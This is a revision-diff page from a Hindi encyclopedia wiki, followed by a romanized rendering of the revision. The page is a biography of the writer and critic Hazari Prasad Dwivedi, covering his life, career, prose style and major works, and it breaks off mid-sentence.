Difference between revisions of "हज़ारी प्रसाद द्विवेदी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
{{सूचना बक्सा साहित्यकार
+
{{हज़ारी प्रसाद द्विवेदी विषय सूची}}
|चित्र=Hazari Prasad Dwivedi.JPG
+
{{सूचना बक्सा हज़ारी प्रसाद द्विवेदी}}
|पूरा नाम=डॉ. हज़ारी प्रसाद द्विवेदी
 
|अन्य नाम=
 
|जन्म=[[19 अगस्त]], [[1907]] ई.
 
|जन्म भूमि=गाँव 'आरत दुबे का छपरा', [[बलिया ज़िला]], [[उत्तर प्रदेश]]
 
|मृत्यु=[[19 मई]], [[1979]]
 
|मृत्यु स्थान=
 
|अभिभावक=
 
|पति/पत्नी=
 
|संतान=
 
|कर्म भूमि=[[वाराणसी]]
 
|कर्म-क्षेत्र=निबन्धकार, [[उपन्यासकार]], अध्यापक, सम्पादक
 
|मुख्य रचनाएँ=सूर साहित्य, बाणभट्ट, [[कबीर -हज़ारी प्रसाद द्विवेदी|कबीर]], अशोक के फूल, हिन्दी साहित्य की भूमिका, हिन्दी साहित्य का आदिकाल, नाथ सम्प्रदाय, पृथ्वीराज रासो
 
|विषय=[[निबन्ध]], कहानी, उपन्यास, आलोचना
 
|भाषा=[[हिन्दी भाषा|हिन्दी]]
 
|विद्यालय=[[काशी हिन्दू विश्वविद्यालय]]
 
|शिक्षा=बारहवीं
 
|पुरस्कार-उपाधि=[[पद्म भूषण]]
 
|प्रसिद्धि=
 
|विशेष योगदान=
 
|नागरिकता=भारतीय
 
|संबंधित लेख=
 
|शीर्षक 1=
 
|पाठ 1=
 
|शीर्षक 2=
 
|पाठ 2=
 
|अन्य जानकारी=द्विवेदी जी कई वर्षों तक [[काशी नागरी प्रचारिणी सभा]] के उपसभापति, 'खोज विभाग' के निर्देशक तथा 'नागरी प्रचारिणी पत्रिका' के सम्पादक रहे हैं।
 
|बाहरी कड़ियाँ=
 
|अद्यतन=
 
}}
 
 
'''डॉ. हज़ारी प्रसाद द्विवेदी''' ([[अंग्रेज़ी]]: ''Hazari Prasad Dwivedi'', जन्म: [[19 अगस्त]], [[1907]] - मृत्यु: [[19 मई]], [[1979]]) [[हिन्दी]] के शीर्षस्थ साहित्यकारों में से हैं। वे उच्चकोटि के निबन्धकार, [[उपन्यासकार]], आलोचक, चिन्तक तथा शोधकर्ता हैं। साहित्य के इन सभी क्षेत्रों में द्विवेदी जी अपनी प्रतिभा और विशिष्ट कर्तव्य के कारण विशेष यश के भागी हुए हैं। द्विवेदी जी का व्यक्तित्व गरिमामय, चित्तवृत्ति उदार और दृष्टिकोण व्यापक है। द्विवेदी जी की प्रत्येक रचना पर उनके इस व्यक्तित्व की छाप देखी जा सकती है।  
 
'''डॉ. हज़ारी प्रसाद द्विवेदी''' ([[अंग्रेज़ी]]: ''Hazari Prasad Dwivedi'', जन्म: [[19 अगस्त]], [[1907]] - मृत्यु: [[19 मई]], [[1979]]) [[हिन्दी]] के शीर्षस्थ साहित्यकारों में से हैं। वे उच्चकोटि के निबन्धकार, [[उपन्यासकार]], आलोचक, चिन्तक तथा शोधकर्ता हैं। साहित्य के इन सभी क्षेत्रों में द्विवेदी जी अपनी प्रतिभा और विशिष्ट कर्तव्य के कारण विशेष यश के भागी हुए हैं। द्विवेदी जी का व्यक्तित्व गरिमामय, चित्तवृत्ति उदार और दृष्टिकोण व्यापक है। द्विवेदी जी की प्रत्येक रचना पर उनके इस व्यक्तित्व की छाप देखी जा सकती है।  
 
==परिचय==
 
==परिचय==
 +
{{main|हज़ारी प्रसाद द्विवेदी का परिचय}}
 
हज़ारी प्रसाद द्विवेदी का जन्म 19 अगस्त, 1907 ([[श्रावण]], [[शुक्ल पक्ष]], [[एकादशी]], [[संवत]] [[1964]]) में बलिया ज़िले के 'आरत दुबे का छपरा' [[गाँव]] के एक प्रतिष्ठित सरयूपारीण [[ब्राह्मण]] कुल में हुआ था। उनके [[पिता]] पण्डित अनमोल द्विवेदी [[संस्कृत]] के प्रकाण्ड पंडित थे। द्विवेदी जी के प्रपितामह ने [[काशी]] में कई वर्षों तक रहकर ज्योतिष का गम्भीर अध्ययन किया था। द्विवेदी जी की [[माता]] भी प्रसिद्ध पण्डित कुल की कन्या थीं। इस तरह बालक द्विवेदी को संस्कृत के अध्ययन का संस्कार विरासत में ही मिल गया था।
 
हज़ारी प्रसाद द्विवेदी का जन्म 19 अगस्त, 1907 ([[श्रावण]], [[शुक्ल पक्ष]], [[एकादशी]], [[संवत]] [[1964]]) में बलिया ज़िले के 'आरत दुबे का छपरा' [[गाँव]] के एक प्रतिष्ठित सरयूपारीण [[ब्राह्मण]] कुल में हुआ था। उनके [[पिता]] पण्डित अनमोल द्विवेदी [[संस्कृत]] के प्रकाण्ड पंडित थे। द्विवेदी जी के प्रपितामह ने [[काशी]] में कई वर्षों तक रहकर ज्योतिष का गम्भीर अध्ययन किया था। द्विवेदी जी की [[माता]] भी प्रसिद्ध पण्डित कुल की कन्या थीं। इस तरह बालक द्विवेदी को संस्कृत के अध्ययन का संस्कार विरासत में ही मिल गया था।
 
द्विवेदी जी की प्रारंभिक शिक्षा गांव के स्कूल में ही हुई और वहीं से उन्होंने मिडिल की परीक्षा पास की। इसके पश्चात् उन्होंने इंटर की परीक्षा और ज्योतिष विषय लेकर आचार्य की परीक्षा उत्तीर्ण की। शिक्षा प्राप्ति के पश्चात द्विवेदी जी 'शांति निकेतन' चले गए और कई वर्षों तक वहां हिंदी विभाग में कार्य करते रहे। शांति निकेतन में [[रवींद्रनाथ ठाकुर]] तथा [[क्षितिजमोहन सेन|आचार्य क्षितिजमोहन सेन]] के प्रभाव से [[साहित्य]] का गहन अध्ययन और उसकी रचना प्रारंभ की। द्विवेदी जी का व्यक्तित्व बड़ा प्रभावशाली और उनका स्वभाव बड़ा सरल और उदार था। वे [[हिंदी]], [[अंग्रेज़ी]], [[संस्कृत]] और बांग्ला भाषाओं के विद्वान थे। भक्तिकालीन साहित्य का उन्हें अच्छा ज्ञान था। [[लखनऊ विश्वविद्यालय]] ने उन्हें डी.लिट. की उपाधि देकर उनका विशेष सम्मान किया था।
 
 
 
==कार्यक्षेत्र==
 
==कार्यक्षेत्र==
सन [[1930]] में इंटर की परीक्षा उत्तीर्ण करने बाद द्विवेदी जी प्राध्यापक होकर [[शान्ति निकेतन]] चले गये। सन् [[1940]] से [[1950]] ई. तक वे वहाँ पर हिन्दी भवन के निर्देशक के पद पर काम करते रहे। शान्ति निकेतन में [[रवीन्द्र नाथ टैगोर]] के घनिष्ठ सम्पर्क में आने पर नये मानवतावाद के प्रति उनके मन में जिस आस्था की प्रतिष्ठा हुई, वह उनके भावी विकास में बहुत ही सहायक बनी। [[क्षितिजमोहन सेन]], विधुशेखर भट्टाचार्य और [[बनारसीदास चतुर्वेदी]] की सन्निकटता से भी उनकी साहित्यिक गतिविधि में अधिक सक्रियता आयी। [[शान्ति निकेतन]] में द्विवेदी जी को अध्ययन-चिन्तन का निर्बाध अवकाश मिला। वास्तव में वहाँ के शान्त और अध्ययनपूर्ण वातावरण में ही द्विवेदी जी के आस्था-विश्वास, जीवन-दर्शन आदि का निर्माण हुआ, जो उनके साहित्य में सर्वत्र प्रतिफलित हुआ है।
+
{{main|हज़ारी प्रसाद द्विवेदी का कार्यक्षेत्र}}
 
+
सन [[1930]] में इंटर की परीक्षा उत्तीर्ण करने बाद द्विवेदी जी प्राध्यापक होकर [[शान्ति निकेतन]] चले गये। सन् [[1940]] से [[1950]] ई. तक वे वहाँ पर हिन्दी भवन के निर्देशक के पद पर काम करते रहे। शान्ति निकेतन में [[रवीन्द्र नाथ टैगोर]] के घनिष्ठ सम्पर्क में आने पर नये मानवतावाद के प्रति उनके मन में जिस आस्था की प्रतिष्ठा हुई, वह उनके भावी विकास में बहुत ही सहायक बनी। [[क्षितिजमोहन सेन]], विधुशेखर भट्टाचार्य और [[बनारसीदास चतुर्वेदी]] की सन्निकटता से भी उनकी साहित्यिक गतिविधि में अधिक सक्रियता आयी।
 
 
सन [[1950]] ई. में [[काशी हिन्दू विश्वविद्यालय]] के तत्कालीन कुलपति के अनुरोध और आमंत्रण पर द्विवेदी जी 'हिन्दी विभाग' के अध्यक्ष और प्रोफ़ेसर होकर वहाँ चले गए। इसके एक वर्ष पूर्व सन् [[1949]] ई. में लखनऊ विश्वविद्यालय ने उनकी हिन्दी की महत्वपूर्ण सेवा के कारण उन्हें डी. लिट्. की सम्मानित उपाधि प्रदान की थी। सन् [[1955]] ई. में वे प्रथम 'ऑफ़िशियल लैंग्वेज कमीशन' के सदस्य चुने गये। सन् [[1957]] ई. में [[भारत सरकार]] ने उनकी विद्धत्ता और साहित्यिक सेवाओं को ध्यान में रखते हुए उन्हें '[[पद्मभूषण]]' की उपाधि से अलंकृत किया। [[1958]] ई. में वे [[नेशनल बुक ट्रस्ट]] के सदस्य बनाये गए। द्विवेदी जी कई वर्षों तक [[काशी नागरी प्रचारिणी सभा]] के उपसभापति, 'खोज विभाग' के निर्देशक तथा 'नागरी प्रचारिणी पत्रिका' के सम्पादक रहे हैं। सन् [[1960]] ई. में [[पंजाब विश्वविद्यालय]] के कुलपति के आमंत्रण पर वे वहाँ के 'हिन्दी विभाग' के अध्यक्ष और प्रोफ़ेसर होकर [[चण्डीगढ़]] चले गये। सन् [[1968]] ई. में ये फिर [[काशी हिन्दू विश्वविद्यालय]] में बुला लिये गए और वहाँ डाइरेक्टर नियुक्त हुए और फिर वहीं हिन्दी के ऐतिहासिक व्याकरण विभाग के निर्देशक नियुक्त हुए। वह काम समाप्त होने पर [[उत्तर प्रदेश]], 'हिन्दी ग्रन्थ अकादमी' के अध्यक्ष हुए।
 
 
 
==हिन्दी समीक्षा को नयी दिशा==
 
द्विवेदी जी आचार्य [[रामचन्द्र शुक्ल]] की परम्परा के आलोचक हैं, फिर भी साहित्य को एक अविच्छिन्न विकास-परम्परा देखने पर बल देकर द्विवेदी जी ने हिन्दी समीक्षा को नयी दिशा दी। साहित्य के इस नैरन्तर्य का विशेष ध्यान रखते हुए भी वे लोक-चेतना को कभी अपनी दृष्टि से ओझल नहीं होने देते। वे मनुष्य की श्रेष्ठता के विश्वासी हैं और उच्चकोटि के साहित्य में इसकी प्रतिष्ठा को वे अनिवार्य मानते हैं। संस्कारजन्य क्षुद्र सीमाओं में बँधकर साहित्य ऊँचा नहीं उठ सकता। अपेक्षित ऊँचाई प्राप्त करने के लिए उसे मनुष्य की विराट एकता और जिजीविषा को आयत्त करना होगा। द्विवेदी जी ने चाहे काल विशेष के सम्बन्ध में, उन्होंने अपनी आलोचनाओं में यह बराबर ध्यान रखा है कि आलोच्य युग या कवि ने किन श्रेयस्कर माननीय मूल्यों की सृष्टि की है। कोई चाहे तो उन्हें मूल्यान्वेषी आलोचक कह सकता है, पर वे आप्त मूल्यों की अडिगता में विश्वास नहीं करते। उनकी दृष्टि में मूल्य बराबर विकसनशील होता है, उसमें पूर्ववर्ती और पार्श्ववर्ती चिन्तन का मिश्रण होता है। [[संस्कृत]], [[अपभ्रंश]] आदि के गम्भीर अध्येता होने के कारण वे साहित्य की सुदीर्घ परम्परा का आलोड़न करते हुए विकासशील मूल्यों का सहज ही आकलन कर लेते हैं।
 
 
==भाषा-शैली==
 
==भाषा-शैली==
 +
{{main|हज़ारी प्रसाद द्विवेदी की भाषा-शैली}}
 
द्विवेदी जी की [[भाषा]] परिमार्जित [[खड़ी बोली]] है। उन्होंने भाव और विषय के अनुसार भाषा का चयनित प्रयोग किया है। उनकी भाषा के दो रूप दिखलाई पड़ते हैं-
 
द्विवेदी जी की [[भाषा]] परिमार्जित [[खड़ी बोली]] है। उन्होंने भाव और विषय के अनुसार भाषा का चयनित प्रयोग किया है। उनकी भाषा के दो रूप दिखलाई पड़ते हैं-
 
#प्राँजल व्यावहारिक भाषा
 
#प्राँजल व्यावहारिक भाषा
Line 50: Line 15:
  
 
प्रथम रूप द्विवेदी जी के सामान्य निबंधों में मिलता है। इस प्रकार की भाषा में [[उर्दू]] और [[अंग्रेज़ी]] के शब्दों का भी समावेश हुआ है। द्वितीय शैली उपन्यासों और सैद्धांतिक आलोचना के क्रम में परिलक्षित होती है। द्विवेदी जी की विषय प्रतिपादन की शैली अध्यापकीय है। शास्त्रीय भाषा रचने के दौरान भी प्रवाह खण्डित नहीं होता।
 
प्रथम रूप द्विवेदी जी के सामान्य निबंधों में मिलता है। इस प्रकार की भाषा में [[उर्दू]] और [[अंग्रेज़ी]] के शब्दों का भी समावेश हुआ है। द्वितीय शैली उपन्यासों और सैद्धांतिक आलोचना के क्रम में परिलक्षित होती है। द्विवेदी जी की विषय प्रतिपादन की शैली अध्यापकीय है। शास्त्रीय भाषा रचने के दौरान भी प्रवाह खण्डित नहीं होता।
 
हज़ारी प्रसाद द्विवेदी की रचनाओं में उनकी [[शैली]] के निम्नलिखित रूप मिलते हैं<ref>{{cite web |url=http://www.hindipath.in/2015/08/aacharya-hajariprasad-dvivedi-jeevani.html |title=हज़ारी प्रसाद द्विवेदी |accessmonthday=19 जुलाई |accessyear=2017 |last= |first= |authorlink= |format= |publisher=hindipath.in |language=हिंदी }}</ref>-
 
#'''गवेषणात्मक शैली''' - द्विवेदी जी के विचारात्मक तथा आलोचनात्मक निबंध इस शैली में लिखे गए हैं। यह शैली द्विवेदी जी की प्रतिनिधि शैली है। इस शैली की भाषा [[संस्कृत]] प्रधान और अधिक प्रांजल है। वाक्य कुछ बड़े-बड़े हैं। इस शैली का एक उदाहरण देखिए- लोक और शास्त्र का समन्वय, ग्राहस्थ और वैराग्य का समन्वय, [[भक्ति]] और ज्ञान का समन्वय, [[भाषा]] और संस्कृति का समन्वय, निर्गुण और सगुण का समन्वय, [[कथा]] और तत्व ज्ञान का समन्वय, [[ब्राह्मण]] और चांडाल का समन्वय, पांडित्य और अपांडित्य का समन्वय, [[रामचरितमानस]] शुरू से आखिर तक समन्वय का काव्य है।
 
#'''वर्णनात्मक शैली''' - द्विवेदी जी की वर्णनात्मक शैली अत्यंत स्वाभाविक एवं रोचक है। इस शैली में [[हिंदी]] के शब्दों की प्रधानता है, साथ ही संस्कृत के [[तत्सम]] और [[उर्दू]] के प्रचलित शब्दों का भी प्रयोग हुआ है। वाक्य अपेक्षाकृत बड़े हैं।
 
#'''व्यंग्यात्मक शैली''' - द्विवेदी जी के [[निबंध|निबंधों]] में व्यंग्यात्मक शैली का बहुत ही सफल और सुंदर प्रयोग हुआ है। इस शैली में भाषा चलती हुई तथा उर्दू, [[फ़ारसी भाषा|फ़ारसी]] आदि के शब्दों का प्रयोग मिलता है।
 
#'''व्यास शैली''' - द्विवेदी जी ने जहां अपने विषय को विस्तारपूर्वक समझाया है, वहां उन्होंने व्यास शैली को अपनाया है। इस शैली के अंतर्गत वे विषय का प्रतिपादन व्याख्यात्मक ढंग से करते हैं और अंत में उसका सार दे देते हैं।
 
 
==वर्ण्य विषय==
 
==वर्ण्य विषय==
 +
{{main|हज़ारी प्रसाद द्विवेदी के वर्ण्य-विषय}}
 
द्विवेदी जी के निबंधों के विषय [[भारतीय संस्कृति]], [[इतिहास]], [[ज्योतिष]], [[साहित्य]], विविध धर्मों और संप्रदायों का विवेचन आदि है। वर्गीकरण की दृष्टि से द्विवेदी जी के [[निबंध]] दो भागों में विभाजित किए जा सकते हैं-
 
द्विवेदी जी के निबंधों के विषय [[भारतीय संस्कृति]], [[इतिहास]], [[ज्योतिष]], [[साहित्य]], विविध धर्मों और संप्रदायों का विवेचन आदि है। वर्गीकरण की दृष्टि से द्विवेदी जी के [[निबंध]] दो भागों में विभाजित किए जा सकते हैं-
 
#विचारात्मक
 
#विचारात्मक
 
#आलोचनात्मक
 
#आलोचनात्मक
 
विचारात्मक निबंधों की दो श्रेणियां हैं। प्रथम श्रेणी के निबंधों में दार्शनिक तत्वों की प्रधानता रहती है। द्वितीय श्रेणी के निबंध सामाजिक जीवन संबंधी होते हैं। आलोचनात्मक निबंध भी दो श्रेणियों में बांटें जा सकते हैं। प्रथम श्रेणी में ऐसे निबंध हैं, जिनमें साहित्य के विभिन्न अंगों का शास्त्रीय दृष्टि से विवेचन किया गया है और द्वितीय श्रेणी में वे निबंध आते हैं, जिनमें साहित्यकारों की कृतियों पर आलोचनात्मक दृष्टि से विचार हुआ है। द्विवेदी जी के इन निबंधों में विचारों की गहनता, निरीक्षण की नवीनता और विश्लेषण की सूक्ष्मता रहती है।
 
 
आचार्य हज़ारी प्रसाद द्विवेदी [[हिन्दी]] के श्रेष्ठ निबंधकार, आलोचक, उपन्यासकार तथा साहित्य के इतिहास के विद्वान् माने जाते हैं। उन्होंने शुक्लोत्तर हिन्दी आलोचना में तो प्रतिमान स्थापित किया ही, 'बाणभट्ट की आत्मकथा' और 'अनामदास का पोथा' जैसे नई शैली के उपन्यासों की सृष्टि भी की। साहित्य के इतिहास लेखन में उनका एक विशिष्ट स्थान है। इन सबके साथ ही वे हिन्दी निबंध के सशक्त हस्ताक्षर हैं। 'कुटज' द्विवेदी जी के आत्मपरक या व्यक्तिव्यंजक निबंधों का प्रतिनिधित्व करता है। 'कुटज' एक जंगली वनस्पति है, जो [[हिमालय]] की विषम पर्वत श्रृंखलाओं में नीरस एवं शुष्क चट्टानों के बीच भी हरा-भरा रहता है। 'कुटज' स्थितप्रज्ञ है, जीवट है, जीवन का उल्लास और उमंग उसमें कूट-कूटकर भरा है। द्विवेदी जी ने 'कुटज' की अपराजेयता और जिजीविषा के माध्यम से जीवन धर्मिता को बचाये रखने का संदेश दिया है। अनुभव का सत्य कैसे आस-पास के परिवेश से जुड़  जाता है और उसकी जड़ें कितनी गहरी हैं- इन सभी बिंदुओं को द्विवेजी जी 'कुटज' के बहाने अपनी फक्कड़ाना और गद्य शैली में टटोलते हैं। उनके जीवन के संघर्ष की अभिव्यक्ति तथा उसकी पीड़ा की तल्खी  'कुटज' में सहज ही देखी जा सकती है। 'कुटज' जैसे साधारण और अदना वृक्ष के असाधारणत्व की प्रतिष्ठा असल में मनुष्य के जीवट की प्रतिष्ठा है। 'कुटज' शब्द की व्युत्पत्ति, उसका भारतीय साहित्य और संस्कृति में उल्लेख, उसके प्रति उपेक्षा भाव और विषम व विपरीत परिस्थितियों में उसकी फक्कड़ाना मस्ती, वस्तुतः द्विवेजी जी के जीवन के कई पहलुओं की ओर संकेत करते हैं।<ref>{{cite web |url=http://vle.du.ac.in/mod/book/view.php?id=8477&chapterid=11005 |title=हज़ारी प्रसाद द्विवेदी-विषय-प्रवेश |accessmonthday=19 जुलाई |accessyear=2017 |last= |first= |authorlink= |format= |publisher=vle.du.ac.in |language=हिंदी }}</ref>
 
 
==कृतियाँ==
 
==कृतियाँ==
{| class="bharattable-purple" border="1" align="right"
+
{{main|हज़ारी प्रसाद द्विवेदी की कृतियाँ}}
|+ प्रमुख कृतियाँ
+
हज़ारी प्रसाद द्विवेदी जी की कुछ कृतियाँ निम्नलिखित हैं-
|-
 
! सन
 
! कृति
 
|-
 
| 1936
 
| सूर साहित्य
 
|-
 
| 1940
 
| हिन्दी साहित्य की भूमिका
 
|-
 
| 1940
 
| प्राचीन भारत में कलात्मक विनोद
 
|-
 
| 1942
 
| कबीर
 
|-
 
| 1947
 
| बाणभट्ट की आत्मकथा
 
|-
 
| 1948
 
| अशोक के फूल
 
|-
 
| 1950
 
| नाथ सम्प्रदाय
 
|-
 
| 1951
 
| कल्पलता
 
|-
 
| 1952
 
| हिन्दी साहित्य
 
|-
 
| 1954
 
| विचार और वितर्क
 
|-
 
| 1957
 
| नाथ सिद्धों की बानियाँ
 
|-
 
| 1957
 
| मेघदूत: एक पुरानी कहानी
 
|-
 
| 1959
 
| विचार प्रवाह
 
|-
 
| 1960
 
| सन्देशरासक
 
|-
 
|
 
| पृथ्वीराज रासो
 
|-
 
| 1967
 
| कालिदास की लालित्य योजना
 
|-
 
| 1970
 
| मध्ययुगीन बोध
 
|-
 
| 1971
 
| आलोक पर्व
 
|-
 
| 1976
 
| अनामदास का पोथा
 
|}
 
हज़ारी प्रसाद द्विवेदी जी की कुछ कृतियाँ निम्नलिखित हैं।
 
 
====हिन्दी साहित्य की भूमिका====
 
====हिन्दी साहित्य की भूमिका====
 
'हिन्दी साहित्य की भूमिका' उनके सिद्धान्तों की बुनियादी पुस्तक है। जिसमें साहित्य को एक अविच्छिन्न परम्परा तथा उसमें प्रतिफलित क्रिया-प्रतिक्रियाओं के रूप में देखा गया है। नवीन दिशा-निर्देश की दृष्टि से इस पुस्तक का ऐतिहासिक महत्व है।  
 
'हिन्दी साहित्य की भूमिका' उनके सिद्धान्तों की बुनियादी पुस्तक है। जिसमें साहित्य को एक अविच्छिन्न परम्परा तथा उसमें प्रतिफलित क्रिया-प्रतिक्रियाओं के रूप में देखा गया है। नवीन दिशा-निर्देश की दृष्टि से इस पुस्तक का ऐतिहासिक महत्व है।  
Line 160: Line 54:
 
*[http://www.hindipath.in/2015/08/aacharya-hajariprasad-dvivedi-jeevani.html आचार्य हज़ारी प्रसाद द्विवेदी की जीवनी]
 
*[http://www.hindipath.in/2015/08/aacharya-hajariprasad-dvivedi-jeevani.html आचार्य हज़ारी प्रसाद द्विवेदी की जीवनी]
 
==संबंधित लेख==
 
==संबंधित लेख==
{{शिक्षक}}{{आलोचक एवं समीक्षक}}{{साहित्यकार}}
+
{{हज़ारी प्रसाद द्विवेदी विषय सूची}}{{शिक्षक}}{{आलोचक एवं समीक्षक}}{{साहित्यकार}}
 
[[Category:साहित्यकार]][[Category:साहित्य कोश]][[Category:उपन्यासकार]][[Category:शिक्षक]][[Category:लेखक]][[Category:आधुनिक लेखक]][[Category:पद्म भूषण]][[Category:हज़ारी प्रसाद द्विवेदी]][[Category:आलोचक]]
 
[[Category:साहित्यकार]][[Category:साहित्य कोश]][[Category:उपन्यासकार]][[Category:शिक्षक]][[Category:लेखक]][[Category:आधुनिक लेखक]][[Category:पद्म भूषण]][[Category:हज़ारी प्रसाद द्विवेदी]][[Category:आलोचक]]
 
__INDEX__
 
__INDEX__

Revision as of 08:41, 19 July 2017

hazari prasad dvivedi vishay soochi
hazari prasad dvivedi
poora nam d aau. hazari prasad dvivedi
janm 19 agast, 1907 ee.
janm bhoomi gaanv 'arat dube ka chhapara', baliya zila, uttar pradesh
mrityu 19 mee, 1979
karm bhoomi varanasi
karm-kshetr nibandhakar, upanyasakar, adhyapak, sampadak
mukhy rachanaean soor sahity, banabhatt, kabir, ashok ke phool, hindi sahity ki bhoomika, hindi sahity ka adikal, nath sampraday, prithviraj raso
vishay nibandh, kahani, upanyas, alochana
bhasha hindi
vidyalay kashi hindoo vishvavidyalay
shiksha barahavian
puraskar-upadhi padm bhooshan
nagarikata bharatiy
any janakari dvivedi ji kee varshoan tak kashi nagari pracharini sabha ke upasabhapati, 'khoj vibhag' ke nirdeshak tatha 'nagari pracharini patrika' ke sampadak rahe haian.
inhean bhi dekhean kavi soochi, sahityakar soochi

d aau. hazari prasad dvivedi (aangrezi: Hazari Prasad Dwivedi, janm: 19 agast, 1907 - mrityu: 19 mee, 1979) hindi ke shirshasth sahityakaroan mean se haian. ve uchchakoti ke nibandhakar, upanyasakar, alochak, chintak tatha shodhakarta haian. sahity ke in sabhi kshetroan mean dvivedi ji apani pratibha aur vishisht kartavy ke karan vishesh yash ke bhagi hue haian. dvivedi ji ka vyaktitv garimamay, chittavritti udar aur drishtikon vyapak hai. dvivedi ji ki pratyek rachana par unake is vyaktitv ki chhap dekhi ja sakati hai.

parichay

  1. REDIRECTsaancha:mukhy

hazari prasad dvivedi ka janm 19 agast, 1907 (shravan, shukl paksh, ekadashi, sanvat 1964) mean baliya zile ke 'arat dube ka chhapara' gaanv ke ek pratishthit sarayooparin brahman kul mean hua tha. unake pita pandit anamol dvivedi sanskrit ke prakand pandit the. dvivedi ji ke prapitamah ne kashi mean kee varshoan tak rahakar jyotish ka gambhir adhyayan kiya tha. dvivedi ji ki mata bhi prasiddh pandit kul ki kanya thian. is tarah balak dvivedi ko sanskrit ke adhyayan ka sanskar virasat mean hi mil gaya tha.

karyakshetr

  1. REDIRECTsaancha:mukhy

san 1930 mean iantar ki pariksha uttirn karane bad dvivedi ji pradhyapak hokar shanti niketan chale gaye. sanh 1940 se 1950 ee. tak ve vahaan par hindi bhavan ke nirdeshak ke pad par kam karate rahe. shanti niketan mean ravindr nath taigor ke ghanishth sampark mean ane par naye manavatavad ke prati unake man mean jis astha ki pratishtha huee, vah unake bhavi vikas mean bahut hi sahayak bani. kshitijamohan sen, vidhushekhar bhattachary aur banarasidas chaturvedi ki sannikatata se bhi unaki sahityik gatividhi mean adhik sakriyata ayi.

bhasha-shaili

  1. REDIRECTsaancha:mukhy

dvivedi ji ki bhasha parimarjit kh di boli hai. unhoanne bhav aur vishay ke anusar bhasha ka chayanit prayog kiya hai. unaki bhasha ke do roop dikhalaee p date haian-

  1. praanjal vyavaharik bhasha
  2. sanskritanishth shastriy bhasha

pratham roop dvivedi ji ke samany nibandhoan mean milata hai. is prakar ki bhasha mean urdoo aur aangrezi ke shabdoan ka bhi samavesh hua hai. dvitiy shaili upanyasoan aur saiddhaantik alochana ke kram mean parilakshit hoti hai. dvivedi ji ki vishay pratipadan ki shaili adhyapakiy hai. shastriy bhasha rachane ke dauran bhi pravah khandit nahian hota.

varny vishay

  1. REDIRECTsaancha:mukhy

dvivedi ji ke nibandhoan ke vishay bharatiy sanskriti, itihas, jyotish, sahity, vividh dharmoan aur sanpradayoan ka vivechan adi hai. vargikaran ki drishti se dvivedi ji ke nibandh do bhagoan mean vibhajit kie ja sakate haian-

  1. vicharatmak
  2. alochanatmak

kritiyaan

  1. REDIRECTsaancha:mukhy

hazari prasad dvivedi ji ki kuchh kritiyaan nimnalikhit haian-

hindi sahity ki bhoomika

'hindi sahity ki bhoomika' unake siddhantoan ki buniyadi pustak hai. jisamean sahity ko ek avichchhinn parampara tatha usamean pratiphalit kriya-pratikriyaoan ke roop mean dekha gaya hai. navin disha-nirdesh ki drishti se is pustak ka aitihasik mahatv hai.

kabir

  1. REDIRECTsaancha:mukhy

apane phakk d vyaktitv, ghar phooank masti aur aur krantikari vicharadhara ke karan kabir ne unhean vishesh akrisht kiya. 'kabir' pustak mean unhoanne jis saanskritik parampara, samasamayik vatavaran aur navin chintan ka udghatan kiya hai, vah unaki uparilikhit alochanatmak drishti ke sarvatha mel mean hai. bhasha bhavoan ki sanvahak hoti hai. kabir ki bhasha vahi hai. ve apani bat ko saph evan do took shabdoan mean kahane ke himayati the. isilie hazari prasad dvivedi ne unhean "vani ka ditektar" kaha hai.

hindi sahity ka adikal

'hindi sahity ka adikal' mean dvivedi ji ne navin upalabdh samagri ke adhar par jo shodhaparak vishleshan prastut kiya hai, usase hindi sahity ke itihas ke pun: parikshan ki avashyakata mahasoos ki ja rahi hai.

nath sampraday

'nath sampraday' mean siddhoan aur nathoan ki upalabdhiyoan par gambhir vichar vyakt kiye ge haian.

soor-sahity

'soor-sahity' unaki prarambhik alochanatmak kriti hai, jo alochanatmak utani nahian hai, jitani ki bhavanatmak. inake atirikt unake anek marmik samikshatmak nibandh vibhinn nibandh-sangrahoan mean sangrahit haian, jo sahity ke vibhinn pakshoan ka gambhir udghatan karate haian.

nibandh

  1. REDIRECTsaancha:mukhy

dvivedi ji jahaan vidvattaparak anusandhanatmak nibandh likh sakate haian, vahaan shreshth nirbandh nibandhoan ki srishti bhi kar sakate haian. unake nirbandh nibandh hindi nibandh sahity ki moolyavanh upalabdhi hai. dvivedi ji ke vyaktitv mean vidvatta aur sarasata ka, pandity aur vidagdhata ka, gambhirata aur vinodamayata ka, prachinata aur navinata ka jo adabhut sanyog milata hai, vah anyatr durlabh hai. in virodhabhasi tatvoan se nirmit unaka vyaktitv hi unake nirbandh nibandhoan mean pratiphalit hua hai. apane nibandhoan mean ve bahut hi sahaj dhang se, anaupacharik roop mean, 'nakhoon kyoan badhate haian', 'am phir baura ge', 'ashok ke phool', 'ek kutta aur ek maina', 'kutaj' adi ki charcha karate haian, jisase pathakoan ka anukooly prapt karane mean unhean koee kathinaee nahian hoti. par unake nibandhoan ka poorn rasasvadan karane ke lie jagah-jagah bikhare hue saanskritik-sahityik sandarbhoan ko janana bahut avashyak hai. in sandarbhoan mean unaki aitihasik chetana ko dekha ja sakata hai, kintu sampoorn nibandh padhane ke bad pathak naye manavatavadi moolyoan ki upalabdhi bhi karata chalata hai. unamean atit ke moolyoan ke prati sahaj mamatv hai, kintu navin ke prati kam utsah nahian hai.

banabhatt

'banabhatt' ki atmakatha' dvivedi ji ka apane dhang ka asamantar upanyas hai, jo apane kathy tatha shaili ke karan sahridayoan dvara vishesh roop se samadrit hua hai. yah hindi upanyas sahity ki vishisht upalabdhi hai. is upanyas mean unake vistrit aur gambhir adhyayan tatha pratibha ka adabhut mishran hua hai. isake madhyam se apane jivan-darshan ke vividh pakshoan ko udghatit karate hue unhoanne ise vaicharik drishti se bhi vishisht ooanchaee pradan ki hai. harshakalin jis vishal phalak par banabhatt ko chitrit kiya gaya hai, vah gahan adhyayan tatha gatyatmak aitihasik chetana ki apeksha rakhata hai. kahana n hoga ki dvivedi ji ke vyaktitv ke nirman mean is aitihasik chetana ka bahut mahattvapoorn yog raha hai. yahi karan hai ki ve samaj aur sanskriti ke vividh ayamoan ko, usake sampoorn parivesh ko, ek ikaee mean saphalata poorvak baandhane mean samarth ho sake haian. thumb|left|hazari prasad dvivedi is upanyas mean kuchh patr, ghatanaean aur prasang itihasashrit haian aur kuchh kalpanik. ban, harsh, kumar krishna, ban ka ghumakk d ke roop mean bhatakate phirana, harsh dvara tiraskrit aur sammanit hona adi itihas dvara anumodit haian. nipunika, bhattini, sucharita, mahamaya, avadhoot pad 